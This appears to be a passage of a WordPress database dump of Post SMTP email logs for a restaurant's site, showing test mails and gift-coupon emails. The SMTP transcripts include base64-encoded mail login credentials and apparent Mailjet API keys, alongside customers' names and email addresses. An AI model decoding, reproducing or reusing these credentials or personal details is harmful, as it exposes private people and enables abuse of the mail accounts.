style=\"font-size: 0.8em\"><a style=\"color:#3f73b9\" href=\"https://wordpress.org/plugins/post-smtp/\">https://wordpress.org/plugins/post-smtp/</a></span>\r\n											</div>\r\n										</div>\r\n									</td>\r\n								</tr>\r\n							</tbody>\r\n						</table>\r\n						<br><span style=\"font-size:0.9em;color:#94c0dc;\">Image source: <a style=\"color:#94c0dc\" href=\"http://poofytoo.com\">poofytoo.com</a> - Used with permission</span>\r\n					</td>\r\n				</tr>\r\n			</tbody>\r\n		</table>\r\n</body>\r\n</html>'),(21943,1151,'original_headers','Content-Type: multipart/alternative;'),(21944,1151,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Mon, 26 Oct 2020 04:49:40 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(21945,1152,'solution','Not found, check status column for more info.'),(21946,1152,'success','1'),(21947,1152,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(21948,1152,'to_header','webmaster@baldisserri.com'),(21949,1152,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(21950,1152,'original_to','webmaster@baldisserri.com'),(21951,1152,'original_subject','Postman SMTP Test (www.ristorantesolymar.it)'),(21952,1152,'original_message','Content-Type: text/plain; charset = \"UTF-8\"\r\nContent-Transfer-Encoding: 8bit\r\n\r\nHello!\r\n\r\nSent by Postman 2.0.15 - https://wordpress.org/plugins/post-smtp/\r\n\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Transfer-Encoding: quoted-printable\r\n\r\n<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\r\n<html xmlns=\"http://www.w3.org/1999/xhtml\">\r\n<head>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" />\r\n<style type=\"text/css\" media=\"all\">\r\n.wporg-notification .im {\r\n	color: #888;\r\n} /* undo a GMail-inserted style */\r\n</style>\r\n</head>\r\n<body class=\"wporg-notification\">\r\n	<div style=\"background: #e8f6fe; font-family: &amp; quot; Helvetica Neue&amp;quot; , Helvetica ,Arial,sans-serif; font-size: 14px; color: #666; text-align: center; margin: 0; padding: 0\">\r\n		<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" bgcolor=\"#e8f6fe\"	style=\"background: #e8f6fe; width: 100%;\">\r\n			<tbody>\r\n				<tr>\r\n					<td>\r\n						<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"padding: 0px; width: 100%;\"\">\r\n							<tbody>\r\n								<tr>\r\n									<td>\r\n										<div style=\"max-width: 600px; height: 400px; margin: 0 auto; overflow: hidden;background-image:url(\'https://ps.w.org/postman-smtp/assets/email/poofytoo.png\');background-repeat: no-repeat;\">\r\n											<div style=\"margin:50px 0 0 300px; width:300px; font-size:2em;\">Hello! - &#20320;&#22909; - Bonjour! - &#2344;&#2350;&#2360;&#2381;&#2340;&#2375; - ¡Hola! - Ol&#225; - &#1055;&#1088;&#1080;&#1074;&#1077;&#1090;! - &#20170;&#26085;&#12399;</div>\r\n											<div style=\"text-align:right;font-size: 1.4em; color:black;margin:150px 0 0 200px;\">Sent by Postman 2.0.15\r\n												<br/><span style=\"font-size: 0.8em\"><a style=\"color:#3f73b9\" href=\"https://wordpress.org/plugins/post-smtp/\">https://wordpress.org/plugins/post-smtp/</a></span>\r\n											</div>\r\n										</div>\r\n									</td>\r\n								</tr>\r\n							</tbody>\r\n						</table>\r\n						<br><span style=\"font-size:0.9em;color:#94c0dc;\">Image source: <a style=\"color:#94c0dc\" href=\"http://poofytoo.com\">poofytoo.com</a> - Used with permission</span>\r\n					</td>\r\n				</tr>\r\n			</tbody>\r\n		</table>\r\n</body>\r\n</html>'),(21953,1152,'original_headers','Content-Type: multipart/alternative;'),(21954,1152,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Mon, 26 Oct 2020 04:49:42 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: multipart/alternative;\r\n boundary=\"=_2445e945075ebbbda946ee8b02861d55\"\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <7bce5f54127d6e6b21c8e6dbd5fb686b@ristorantesolymar.it>\r\nSubject: Postman SMTP Test (www.ristorantesolymar.it)\r\nDate: Mon, 26 Oct 2020 08:49:42 +0000\r\nMIME-Version: 1.0\r\n\r\n--=_2445e945075ebbbda946ee8b02861d55\r\nContent-Type: text/plain; charset=UTF-8\r\nContent-Transfer-Encoding: quoted-printable\r\n\r\nHello!=0D=0DSent by Postman 2.0.15 - https://wordpress.org/plugins/post-=\r\nsmtp/=0D=0D\r\n\r\n--=_2445e945075ebbbda946ee8b02861d55\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Transfer-Encoding: quoted-printable\r\n\r\n<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://w=\r\nww.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">=0D<html xmlns=3D\"http:=\r\n//www.w3.org/1999/xhtml\">=0D<head>=0D<meta http-equiv=3D\"Content-Type\" c=\r\nontent=3D\"text/html; charset=3Dutf-8\" />=0D<style type=3D\"text/css\" medi=\r\na=3D\"all\">=0D.wporg-notification .im {=0D=09color: #888;=0D} /* undo a G=\r\nMail-inserted style */=0D</style>=0D</head>=0D<body class=3D\"wporg-notif=\r\nication\">=0D=09<div style=3D\"background: #e8f6fe; font-family: &amp; quo=\r\nt; Helvetica Neue&amp;quot; , Helvetica ,Arial,sans-serif; font-size: 14=\r\npx; color: #666; text-align: center; margin: 0; padding: 0\">=0D=09=09<ta=\r\nble border=3D\"0\" cellspacing=3D\"0\" cellpadding=3D\"0\" bgcolor=3D\"#e8f6fe\"=\r\n=09style=3D\"background: #e8f6fe; width: 100%;\">=0D=09=09=09<tbody>=0D=09=\r\n=09=09=09<tr>=0D=09=09=09=09=09<td>=0D=09=09=09=09=09=09<table border=3D=\r\n\"0\" cellspacing=3D\"0\" cellpadding=3D\"0\" align=3D\"center\" style=3D\"paddin=\r\ng: 0px; width: 100%;\"\">=0D=09=09=09=09=09=09=09<tbody>=0D=09=09=09=09=09=\r\n=09=09=09<tr>=0D=09=09=09=09=09=09=09=09=09<td>=0D=09=09=09=09=09=09=09=\r\n=09=09=09<div style=3D\"max-width: 600px; height: 400px; margin: 0 auto;=\r\n overflow: hidden;background-image:url(\'https://ps.w.org/postman-smtp/as=\r\nsets/email/poofytoo.png\');background-repeat: no-repeat;\">=0D=09=09=09=09=\r\n=09=09=09=09=09=09=09<div style=3D\"margin:50px 0 0 300px; width:300px; f=\r\nont-size:2em;\">Hello! - &#20320;&#22909; - Bonjour! - &#2344;&#2350;&#23=\r\n60;&#2381;&#2340;&#2375; - =C2=A1Hola! - Ol&#225; - &#1055;&#1088;&#1080=\r\n;&#1074;&#1077;&#1090;! - &#20170;&#26085;&#12399;</div>=0D=09=09=09=09=\r\n=09=09=09=09=09=09=09<div style=3D\"text-align:right;font-size: 1.4em; co=\r\nlor:black;margin:150px 0 0 200px;\">Sent by Postman 2.0.15=0D=09=09=09=09=\r\n=09=09=09=09=09=09=09=09<br/><span style=3D\"font-size: 0.8em\"><a style=\r\n=3D\"color:#3f73b9\" href=3D\"https://wordpress.org/plugins/post-smtp/\">htt=\r\nps://wordpress.org/plugins/post-smtp/</a></span>=0D=09=09=09=09=09=09=09=\r\n=09=09=09=09</div>=0D=09=09=09=09=09=09=09=09=09=09</div>=0D=09=09=09=09=\r\n=09=09=09=09=09</td>=0D=09=09=09=09=09=09=09=09</tr>=0D=09=09=09=09=09=\r\n=09=09</tbody>=0D=09=09=09=09=09=09</table>=0D=09=09=09=09=09=09<br><spa=\r\nn style=3D\"font-size:0.9em;color:#94c0dc;\">Image source: <a style=3D\"col=\r\nor:#94c0dc\" href=3D\"http://poofytoo.com\">poofytoo.com</a> - Used with pe=\r\nrmission</span>=0D=09=09=09=09=09</td>=0D=09=09=09=09</tr>=0D=09=09=09</=\r\ntbody>=0D=09=09</table>=0D</body>=0D</html>\r\n\r\n--=_2445e945075ebbbda946ee8b02861d55--\r\n.\r\n250 OK id=1kWyCE-0007Nn-KY\r\n'),(21955,1153,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(21956,1153,'success',''),(21957,1153,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(21958,1153,'to_header','marcello.manduchi@hotmail.it'),(21959,1153,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21960,1153,'original_to','[\"marcello.manduchi@hotmail.it\"]'),(21961,1153,'original_subject','Un buono regale per te - Sol Y Mar'),(21962,1153,'original_message','<!DOCTYPE html>\n<html>\n<head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"></head>\n<body style=\"padding: 0;\"><p>Il coupon che hai acquistato è stato inviato via email all\'indirizzo destinatario che hai specificato durante l\'ordine.</p></body>\n</html>\n'),(21963,1153,'original_headers','Content-Type: text/html\r\n'),(21964,1153,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Mon, 26 Oct 2020 04:52:20 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(21965,1154,'solution','Not found, check status column for more info.'),(21966,1154,'success','1'),(21967,1154,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(21968,1154,'to_header','marcello.manduchi@hotmail.it'),(21969,1154,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(21970,1154,'original_to','[\"marcello.manduchi@hotmail.it\"]'),(21971,1154,'original_subject','Un buono regale per te - Sol Y Mar'),(21972,1154,'original_message','<!DOCTYPE html>\n<html>\n<head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"></head>\n<body style=\"padding: 0;\"><p>Il coupon che hai acquistato è stato inviato via email all\'indirizzo destinatario che hai specificato durante l\'ordine.</p></body>\n</html>\n'),(21973,1154,'original_headers','Content-Type: text/html\r\n'),(21974,1154,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Mon, 26 Oct 2020 04:52:22 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<marcello.manduchi@hotmail.it>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.15 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/html; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: marcello.manduchi@hotmail.it\r\nMessage-Id: <9a15731139afa6539ffd0d4b57e33d0b@ristorantesolymar.it>\r\nSubject: Un buono regale per te - Sol Y Mar\r\nDate: Mon, 26 Oct 2020 08:52:22 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\n<!DOCTYPE html>=0A<html>=0A<head><meta http-equiv=3D\"Content-Type\" conte=\r\nnt=3D\"text/html; charset=3Dutf-8\"></head>=0A<body style=3D\"padding: 0;\">=\r\n<p>Il coupon che hai acquistato =C3=A8 stato inviato via email all\'indir=\r\nizzo destinatario che hai specificato durante l\'ordine.</p></body>=0A</h=\r\ntml>=0A\r\n.\r\n250 OK id=1kWyEo-0007p4-HH\r\n'),(21975,1155,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(21976,1155,'success',''),(21977,1155,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(21978,1155,'to_header','Filos4@libero.it'),(21979,1155,'bcc_header','marcello.manduchi@hotmail.it'),(21980,1155,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21981,1155,'original_to','[\"Filos4@libero.it\"]'),(21982,1155,'original_subject','Sol Y Mar, ristorante a Riccione'),(21983,1155,'original_message','<!DOCTYPE html>\n<html>\n<head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"></head>\n<body style=\"padding: 0;\">\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"margin: 0 auto; background-color: #ff9898; border-spacing: 10px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 5px;\">\r\n<table class=\"email-container\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; margin: 0 auto; width: 100%; padding: 10px 0px; border: 2px dashed #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px 0; text-align: left;\"><a style=\"font-weight: normal; text-decoration: none; color: #ffffff; margin-left: 10px;\"><img src=\"http://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png\" width=\"200px\" height=\"150px\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></a></td>\r\n<td style=\"padding: 10px 0; text-align: center;\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2017/07/buono.png\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></td>\r\n</tr>\r\n<tr>\r\n<td class=\"img-block\" style=\"text-align: center; padding: 2px 0px;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n \r\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; margin: auto;\">\r\n<tbody>\r\n<tr>\r\n<td bgcolor=\"#ffffff\" style=\"text-align: center; font-family: sans-serif; font-size: 15px; line-height: 20px; color: #555555;\"></td>\r\n</tr>\r\n<!-- -->\r\n<tr>\r\n<td align=\"center\" valign=\"top\" bgcolor=\"#ffffff\" style=\"padding: 15px;\">\r\n<table border=\"0\" width=\"100%;\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top; width: 50%;\">\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px; text-align: center; width: 50%;\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/mwb_browse/FC219D35-A4C2-40F9-B88E-9A95FB4FD648.jpeg\" width=\"100%\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top;\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"center-on-narrow\" style=\"font-family: sans-serif; font-size: 15px; line-height: 20px; color: #555555; padding: 10px; text-align: left; word-break: break-word;\">\r\n<p style=\"min-height: 180px;\">Ti doniamo un piccolo momento di piacere, per ringraziarti del tempo e delle cure che ci hai dedicato in questi mesi. Grazie zio!</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 0 10px; color: #373737;\">\n<span style=\"float: left; padding: 0 3% 0 0; text-align: right;\">Da :</span><span style=\"width: 75%; float: left; word-break: break-all;\">Amalia e Riccardo Manduchi</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px; color: #373737;\">\n<span style=\"float: left; padding: 0 3% 0 0; text-align: right;\">A :</span><span style=\"width: 75%; float: left; word-break: break-all;\">Filippo Saulle</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px; color: #373737;\">\r\n<h3 style=\"color: #557da1; display: block; font-weight: bold; line-height: 130%; margin: 16px 0 8px; text-align: left; font-size: 30px; font-family: Arial, Helvetica, sans-serif;\"><span class=\"woocommerce-Price-amount amount\"><bdi>100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></bdi></span></h3>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"middle\" style=\"text-align: center; background-color: #ffd5d5; padding: 10px;\">\r\n<div>\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; border-spacing: 20px; border: 2px dashed #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"middle\" style=\"padding: 10px 0px; font-family: sans-serif; line-height: 20px; color: #ff9898; text-align: center; border: 3px;\">\r\n<h2 style=\"color: #557da1; display: block; font-weight: bold; line-height: 130%; padding: 0px; margin: 10px 0px; font-family: Arial, Helvetica, sans-serif; font-size: 15px; text-align: center;\">Codice Coupon</h2>\r\n<p style=\"font-size: 25px; font-weight: bold; margin: 0px; text-align: center;\"><img class=\"mwb_wgm_coupon_img\" id=\"1603656130www.ristorantesolymar.it\" src=\"https://www.ristorantesolymar.it/wp-content/uploads/qrcode_barcode/mwb__1603656130solymarcouponB4WIL.png\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></p>\r\n<span style=\"font-size: 15px; text-align: center; padding: 10px 0px;\">(Scadenza. 23/04/2021)</span>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center; padding: 15px; color: #ffffff; background-color: #ff9898; font-size: 18px; font-family: Arial, Helvetica, sans-serif;\">Trovi il regolamento dell\'utilizzo dei Coupon / Buoni regali sul <a href=\"https://www.ristorantesolymar.it/info-privacy/\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">sito</a>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\n</body>\n</html>\n'),(21984,1155,'original_headers','Bcc:marcello.manduchi@hotmail.it'),(21985,1155,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Mon, 26 Oct 2020 04:52:30 -0400 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(21986,1156,'solution','Not found, check status column for more info.'),(21987,1156,'success','1'),(21988,1156,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(21989,1156,'to_header','Filos4@libero.it'),(21990,1156,'bcc_header','marcello.manduchi@hotmail.it'),(21991,1156,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(21992,1156,'original_to','[\"Filos4@libero.it\"]'),(21993,1156,'original_subject','Sol Y Mar, ristorante a Riccione'),(21994,1156,'original_message','<!DOCTYPE html>\n<html>\n<head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"></head>\n<body style=\"padding: 0;\">\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"margin: 0 auto; background-color: #ff9898; border-spacing: 10px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 5px;\">\r\n<table class=\"email-container\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; margin: 0 auto; width: 100%; padding: 10px 0px; border: 2px dashed #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px 0; text-align: left;\"><a style=\"font-weight: normal; text-decoration: none; color: #ffffff; margin-left: 10px;\"><img src=\"http://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png\" width=\"200px\" height=\"150px\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></a></td>\r\n<td style=\"padding: 10px 0; text-align: center;\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2017/07/buono.png\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></td>\r\n</tr>\r\n<tr>\r\n<td class=\"img-block\" style=\"text-align: center; padding: 2px 0px;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n \r\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; margin: auto;\">\r\n<tbody>\r\n<tr>\r\n<td bgcolor=\"#ffffff\" style=\"text-align: center; font-family: sans-serif; font-size: 15px; line-height: 20px; color: #555555;\"></td>\r\n</tr>\r\n<!-- -->\r\n<tr>\r\n<td align=\"center\" valign=\"top\" bgcolor=\"#ffffff\" style=\"padding: 15px;\">\r\n<table border=\"0\" width=\"100%;\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top; width: 50%;\">\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px; text-align: center; width: 50%;\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/mwb_browse/FC219D35-A4C2-40F9-B88E-9A95FB4FD648.jpeg\" width=\"100%\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top;\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"center-on-narrow\" style=\"font-family: sans-serif; font-size: 15px; line-height: 20px; color: #555555; padding: 10px; text-align: left; word-break: break-word;\">\r\n<p style=\"min-height: 180px;\">Ti doniamo un piccolo momento di piacere, per ringraziarti del tempo e delle cure che ci hai dedicato in questi mesi. Grazie zio!</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 0 10px; color: #373737;\">\n<span style=\"float: left; padding: 0 3% 0 0; text-align: right;\">Da :</span><span style=\"width: 75%; float: left; word-break: break-all;\">Amalia e Riccardo Manduchi</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px; color: #373737;\">\n<span style=\"float: left; padding: 0 3% 0 0; text-align: right;\">A :</span><span style=\"width: 75%; float: left; word-break: break-all;\">Filippo Saulle</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px; color: #373737;\">\r\n<h3 style=\"color: #557da1; display: block; font-weight: bold; line-height: 130%; margin: 16px 0 8px; text-align: left; font-size: 30px; font-family: Arial, Helvetica, sans-serif;\"><span class=\"woocommerce-Price-amount amount\"><bdi>100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></bdi></span></h3>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"middle\" style=\"text-align: center; background-color: #ffd5d5; padding: 10px;\">\r\n<div>\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; border-spacing: 20px; border: 2px dashed #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"middle\" style=\"padding: 10px 0px; font-family: sans-serif; line-height: 20px; color: #ff9898; text-align: center; border: 3px;\">\r\n<h2 style=\"color: #557da1; display: block; font-weight: bold; line-height: 130%; padding: 0px; margin: 10px 0px; font-family: Arial, Helvetica, sans-serif; font-size: 15px; text-align: center;\">Codice Coupon</h2>\r\n<p style=\"font-size: 25px; font-weight: bold; margin: 0px; text-align: center;\"><img class=\"mwb_wgm_coupon_img\" id=\"1603656130www.ristorantesolymar.it\" src=\"https://www.ristorantesolymar.it/wp-content/uploads/qrcode_barcode/mwb__1603656130solymarcouponB4WIL.png\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></p>\r\n<span style=\"font-size: 15px; text-align: center; padding: 10px 0px;\">(Scadenza. 23/04/2021)</span>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center; padding: 15px; color: #ffffff; background-color: #ff9898; font-size: 18px; font-family: Arial, Helvetica, sans-serif;\">Trovi il regolamento dell\'utilizzo dei Coupon / Buoni regali sul <a href=\"https://www.ristorantesolymar.it/info-privacy/\" style=\"color: #557da1; font-weight: normal; text-decoration: 